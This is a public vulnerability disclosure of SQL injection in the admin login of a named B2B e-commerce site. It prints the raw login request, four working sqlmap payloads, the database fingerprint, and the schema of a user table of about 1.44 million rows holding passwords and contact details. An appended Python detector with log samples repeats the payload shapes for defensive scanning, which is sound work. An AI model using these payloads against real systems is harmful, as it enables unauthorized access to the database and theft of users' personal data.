2015-07-01: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2015-08-15: The vendor has actively ignored the vulnerability; details are disclosed to the public.

SQL injection on the main site of a B2B e-commerce website leaks 1 million users' account names, passwords, contact details and ID card numbers
Injection:

POST /login.do HTTP/1.1
Host: admin.huangye88.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://admin.huangye88.com/
Cookie: PHPSESSID=rllpo5ncmo2rl8gk4fti93ie46; formhash=58e4af81
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

formhash=58e4af81&admin_name=admin&admin_pwd=admin&from=&submit.x=16&submit.y=19
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: admin_name (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: formhash=58e4af81&admin_name=admin' RLIKE (SELECT (CASE WHEN (1586=1586) THEN 0x61646d696e ELSE 0x28 END)) AND 'PPum'='PPum&admin_pwd=admin&from=&submit.x=16&submit.y=19

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: formhash=58e4af81&admin_name=admin' AND (SELECT 5715 FROM(SELECT COUNT(*),CONCAT(0x7171786b71,(SELECT (ELT(5715=5715,1))),0x7178767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'DqoY'='DqoY&admin_pwd=admin&from=&submit.x=16&submit.y=19

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (comment)
    Payload: formhash=58e4af81&admin_name=admin' OR SLEEP(5)#&admin_pwd=admin&from=&submit.x=16&submit.y=19

    Type: UNION query
    Title: Generic UNION query (NULL) - 39 columns
    Payload: formhash=58e4af81&admin_name=-2857' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171786b71,0x7a6e66426a5561447848,0x7178767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &admin_pwd=admin&from=&submit.x=16&submit.y=19
---
web application technology: PHP 5.4.30
back-end DBMS: MySQL 5.0
current database: 'hy_web'

Database: hy_web
Table: hy_user
[39 columns]
+-----------------------+------------------+
| Column                | Type             |
+-----------------------+------------------+
| android_clientid      | varchar(128)     |
| ban_expire            | int(11)          |
| chengxinzhi           | int(11)          |
| emailauthen           | int(11)          |
| fromse                | int(11)          |
| id                    | int(11)          |
| inviter               | int(11)          |
| ios_clientid          | varchar(128)     |
| ismoderator           | tinyint(1)       |
| isweixin              | tinyint(1)       |
| items                 | int(11)          |
| jifen                 | int(11)          |
| jingyan               | mediumint(9)     |
| logindays_continuous  | smallint(6)      |
| mqq                   | varchar(50)      |
| mwx                   | varchar(50)      |
| new_system_notes      | varchar(255)     |
| qq                    | varchar(50)      |
| qqweibo               | varchar(200)     |
| ses                   | varchar(50)      |
| sinaweibo             | varchar(200)     |
| user_answer           | varchar(200)     |
| user_createtime       | timestamp        |
| user_email            | varchar(50)      |
| user_from             | varchar(255)     |
| user_group            | int(10)          |
| user_lastloginip      | varchar(26)      |
| user_lastlogintime    | int(10)          |
| user_logintimes       | int(11)          |
| user_logintimes_daily | smallint(6)      |
| user_mobile           | varchar(32)      |
| user_name             | varchar(100)     |
| user_password         | varchar(100)     |
| user_purview          | text             |
| user_question         | varchar(200)     |
| user_state            | tinyint(2)       |
| weixin                | varchar(32)      |
| weixin_ctime          | int(10) unsigned |
| wx                    | varchar(50)      |
+-----------------------+------------------+

Database: hy_web
+---------+---------+
| Table   | Entries |
+---------+---------+
| hy_user | 1442375 |
+---------+---------+
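The sqlmap output above reports four distinct injection classes against the admin_name field of login.do. As an added detection example (not part of the original report, and not the site's own code), the following Python scans POST bodies in the shape of that request for the distinctive fragment of each class; the log record format and the sample records are constructed for the example.

```python
import re
from urllib.parse import parse_qs

# Indicator patterns for the four injection classes sqlmap reported against
# admin_name above; each keys on a distinctive fragment of that class rather
# than on generic SQL keywords, so ordinary logins are not flagged.
RULES = {
    "boolean-based blind": re.compile(
        r"'\s*(?:RLIKE|AND|OR)\b.*'[^']*'\s*=\s*'", re.I | re.S),
    "error-based": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I | re.S),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}

# login.do form fields whose values reach the SQL query.
WATCHED_FIELDS = ("admin_name", "admin_pwd")


def classify_body(body: str) -> dict:
    """Map each watched field to the injection classes its URL-decoded value
    matches; an empty dict means the body looks like a normal login."""
    params = parse_qs(body, keep_blank_values=True)
    hits = {}
    for field in WATCHED_FIELDS:
        for value in params.get(field, []):
            classes = [name for name, rx in RULES.items() if rx.search(value)]
            if classes:
                hits.setdefault(field, []).extend(classes)
    return hits


def scan_log(records) -> list:
    """Run classify_body over '<ip> POST <path> <body>' records (a constructed
    log shape, assumed for this example) and return (ip, hits) per flagged record."""
    flagged = []
    for rec in records:
        ip, _method, _path, body = rec.split(" ", 3)
        hits = classify_body(body)
        if hits:
            flagged.append((ip, hits))
    return flagged


# Constructed records (not real traffic): one legitimate login followed by
# shortened forms of three payload shapes from the sqlmap output.
SAMPLE_LOG = [
    "203.0.113.5 POST /login.do formhash=58e4af81&admin_name=admin&admin_pwd=admin&from=&submit.x=16&submit.y=19",
    "198.51.100.7 POST /login.do formhash=58e4af81&admin_name=admin%27+OR+SLEEP%285%29%23&admin_pwd=admin",
    "198.51.100.7 POST /login.do formhash=58e4af81&admin_name=admin' RLIKE (SELECT 1) AND 'PPum'='PPum&admin_pwd=admin",
    "198.51.100.7 POST /login.do formhash=58e4af81&admin_name=-2857' UNION ALL SELECT NULL,NULL-- &admin_pwd=admin",
]
```

Detection only narrows the window; the fix the report asks for is to stop concatenating admin_name into the query at all, which a prepared statement with bound parameters provides.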
Filter user input.
Unable to contact the vendor, or the vendor actively refused.
Vulnerability Rank: 15 (WooYun rating)